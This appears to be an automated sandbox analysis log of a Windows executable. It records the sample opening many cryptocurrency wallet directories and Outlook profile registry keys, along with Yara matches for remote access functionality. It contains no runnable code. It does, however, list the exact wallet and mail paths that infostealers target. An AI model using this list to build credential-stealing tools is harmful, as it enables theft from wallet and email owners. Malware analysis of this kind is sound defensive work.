Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Source: Yara match File source: Process Memory Space: 4c469e2cf403fea6249e835ddce23de2.exe PID: 6900, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000000.00000002.1940177043.0000000003D18000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1939639884.0000000001D51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 4c469e2cf403fea6249e835ddce23de2.exe PID: 6900, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: 4c469e2cf403fea6249e835ddce23de2.exe PID: 6900, type: MEMORYSTR
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_00A02FE0 WSASocketW,_memset,htonl,htons,bind,__beginthreadex, 0_2_00A02FE0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C880C40 sqlite3_bind_zeroblob, 0_2_6C880C40
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C880D60 sqlite3_bind_parameter_name, 0_2_6C880D60
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7A8EA0 sqlite3_clear_bindings, 0_2_6C7A8EA0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C880B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 0_2_6C880B40
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7A6410 bind,WSAGetLastError, 0_2_6C7A6410